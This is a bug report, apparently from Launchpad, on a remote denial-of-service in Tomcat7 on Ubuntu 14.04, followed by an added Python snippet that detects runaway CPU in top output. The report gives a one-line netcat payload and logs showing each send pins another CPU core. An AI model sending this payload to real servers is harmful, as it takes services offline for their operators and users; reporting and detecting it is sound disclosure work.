Comment 0 for bug 1663318

I've been noticing during the last week that the java process was using 100% CPU, and after upgrading twice already the bug persisted. After keeping tcpdump in the background for about two days I managed to find the payload that triggers this bug.

To reproduce, use the following command: printf "\0x05\0x02\0x00\0x02" | nc host_here 8080

The more times you send the payload, the more CPU will be used, as can be seen on my quad-core system below (please note this can be exploited remotely; I'm doing it from the server itself for clarity):

--------------------------------------

$ lsb_release -a
No LSB modules are available.
Distributor ID: Ubuntu
Description: Ubuntu 14.04.5 LTS
Release: 14.04
Codename: trusty
$ sudo service tomcat7 restart
 * Stopping Tomcat servlet engine tomcat7 [ OK ]
 * Starting Tomcat servlet engine tomcat7 [ OK ]
$ printf "\0x05\0x02\0x00\0x02" | nc -w 5 localhost 8080; top -bn 1 | head
HTTP/1.1 400 Bad Request
Server: Apache-Coyote/1.1
Transfer-Encoding: chunked
Date: Thu, 09 Feb 2017 17:01:04 GMT
Connection: close

0

top - 14:01:09 up 1:04, 1 user, load average: 1.86, 0.97, 0.48
Tasks: 129 total, 1 running, 128 sleeping, 0 stopped, 0 zombie
%Cpu(s): 5.9 us, 0.1 sy, 0.0 ni, 93.1 id, 0.9 wa, 0.0 hi, 0.0 si, 0.0 st
KiB Mem: 2045984 total, 374644 used, 1671340 free, 23272 buffers
KiB Swap: 2097148 total, 0 used, 2097148 free. 147784 cached Mem

  PID USER PR NI VIRT RES SHR S %CPU %MEM TIME+ COMMAND
 1942 tomcat7 20 0 2110000 129088 18748 S 103.7 6.3 0:26.10 java
    1 root 20 0 33480 4008 2640 S 0.0 0.2 0:01.18 init
    2 root 20 0 0 0 0 S 0.0 0.0 0:00.00 kthreadd
$ printf "\0x05\0x02\0x00\0x02" | nc -w 5 localhost 8080; top -bn 1 | head
HTTP/1.1 400 Bad Request
Server: Apache-Coyote/1.1
Transfer-Encoding: chunked
Date: Thu, 09 Feb 2017 17:01:12 GMT
Connection: close

0

top - 14:01:17 up 1:05, 1 user, load average: 1.87, 0.99, 0.49
Tasks: 129 total, 1 running, 128 sleeping, 0 stopped, 0 zombie
%Cpu(s): 5.9 us, 0.1 sy, 0.0 ni, 93.0 id, 0.9 wa, 0.0 hi, 0.0 si, 0.0 st
KiB Mem: 2045984 total, 374684 used, 1671300 free, 23280 buffers
KiB Swap: 2097148 total, 0 used, 2097148 free. 147784 cached Mem

  PID USER PR NI VIRT RES SHR S %CPU %MEM TIME+ COMMAND
 1942 tomcat7 20 0 2110000 129012 18748 S 195.5 6.3 0:39.13 java
    1 root 20 0 33480 4008 2640 S 0.0 0.2 0:01.18 init
    2 root 20 0 0 0 0 S 0.0 0.0 0:00.00 kthreadd
$ printf "\0x05\0x02\0x00\0x02" | nc -w 5 localhost 8080; top -bn 1 | head
HTTP/1.1 400 Bad Request
Server: Apache-Coyote/1.1
Transfer-Encoding: chunked
Date: Thu, 09 Feb 2017 17:01:19 GMT
Connection: close

0

top - 14:01:24 up 1:05, 1 user, load average: 1.97, 1.04, 0.51
Tasks: 129 total, 1 running, 128 sleeping, 0 stopped, 0 zombie
%Cpu(s): 6.1 us, 0.1 sy, 0.0 ni, 92.9 id, 0.9 wa, 0.0 hi, 0.0 si, 0.0 st
KiB Mem: 2045984 total, 375928 used, 1670056 free, 23280 buffers
KiB Swap: 2097148 total, 0 used, 2097148 free. 147784 cached Mem

  PID USER PR NI VIRT RES SHR S %CPU %MEM TIME+ COMMAND
 1942 tomcat7 20 0 2110000 130104 18748 S 299.6 6.4 0:59.01 java
    1 root 20 0 33480 4008 2640 S 0.0 0.2 0:01.18 init
    2 root 20 0 0 0 0 S 0.0 0.0 0:00.00 kthreadd
$ printf "\0x05\0x02\0x00\0x02" | nc -w 5 localhost 8080; top -bn 1 | head
HTTP/1.1 400 Bad Request
Server: Apache-Coyote/1.1
Transfer-Encoding: chunked
Date: Thu, 09 Feb 2017 17:01:26 GMT
Connection: close

0

top - 14:01:31 up 1:05, 1 user, load average: 2.13, 1.09, 0.53
Tasks: 129 total, 1 running, 128 sleeping, 0 stopped, 0 zombie
%Cpu(s): 6.2 us, 0.1 sy, 0.0 ni, 92.7 id, 0.9 wa, 0.0 hi, 0.0 si, 0.0 st
KiB Mem: 2045984 total, 375992 used, 1669992 free, 23296 buffers
KiB Swap: 2097148 total, 0 used, 2097148 free. 147784 cached Mem

  PID USER PR NI VIRT RES SHR S %CPU %MEM TIME+ COMMAND
 1942 tomcat7 20 0 2110000 130364 18748 S 397.4 6.4 1:26.01 java
    1 root 20 0 33480 4008 2640 S 0.0 0.2 0:01.18 init
    2 root 20 0 0 0 0 S 0.0 0.0 0:00.00 kthreadd

--------------------------------------

Please let me know if I can assist you in solving this problem. I'll probably upgrade to Ubuntu 16.04 LTS next week, which hopefully won't be vulnerable to this bug.

Thanks
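As an added example from the defender's side (not part of the bug report and not Tomcat code), a small Python check that parses `top -bn 1` process tables like the ones pasted above and flags the stair-step CPU growth the reporter observed, where each malformed connection appears to leave another thread spinning. The snapshot values are constructed from the report's own numbers; the column layout, the 80% step threshold and the "one busy thread is about 100%" estimate are assumptions.

```python
"""Flag a process whose %CPU climbs by roughly one core per sample.

SNAPSHOTS are constructed from the `top -bn 1` values in the report
(PID 1942, java: 103.7 -> 195.5 -> 299.6 -> 397.4 %CPU), trimmed to the
process table; everything else here is an assumption for the example.
"""

HEADER = "  PID USER PR NI VIRT RES SHR S %CPU %MEM TIME+ COMMAND"
SNAPSHOTS = [
    HEADER + "\n"
    + f" 1942 tomcat7 20 0 2110000 129088 18748 S {cpu} 6.3 {t} java\n"
    + "    1 root 20 0 33480 4008 2640 S 0.0 0.2 0:01.18 init"
    for cpu, t in [("103.7", "0:26.10"), ("195.5", "0:39.13"),
                   ("299.6", "0:59.01"), ("397.4", "1:26.01")]
]


def parse_top(snapshot):
    """Return {pid: (command, cpu_pct)} from one `top -b` snapshot."""
    cols, procs = None, {}
    for line in snapshot.splitlines():
        fields = line.split()
        if not fields:
            continue
        if fields[0] == "PID":
            # Column positions come from the header, not from fixed widths.
            cols = {name: i for i, name in enumerate(fields)}
        elif cols and fields[0].isdigit() and len(fields) >= len(cols):
            procs[int(fields[0])] = (fields[cols["COMMAND"]],
                                     float(fields[cols["%CPU"]]))
    return procs


def cpu_series(snapshots, command):
    """Highest %CPU of any process named `command` per snapshot (0.0 if absent)."""
    return [max([cpu for cmd, cpu in parse_top(s).values() if cmd == command],
                default=0.0) for s in snapshots]


def saturated_cores(series):
    """Approximate number of busy threads: one spinning thread is about 100%."""
    return [round(cpu / 100) for cpu in series]


def is_runaway(series, min_step=80.0):
    """True when every consecutive sample adds at least ~one more busy core,
    the stair-step pattern in the report (each bad connection pins a thread)."""
    deltas = [b - a for a, b in zip(series, series[1:])]
    return bool(deltas) and all(d >= min_step for d in deltas)
```

On a live host the same functions can be fed the output of `top -bn 1` collected every few seconds; a steady high reading is ordinary load, while a rise of about a full core per sample is the symptom worth alerting on.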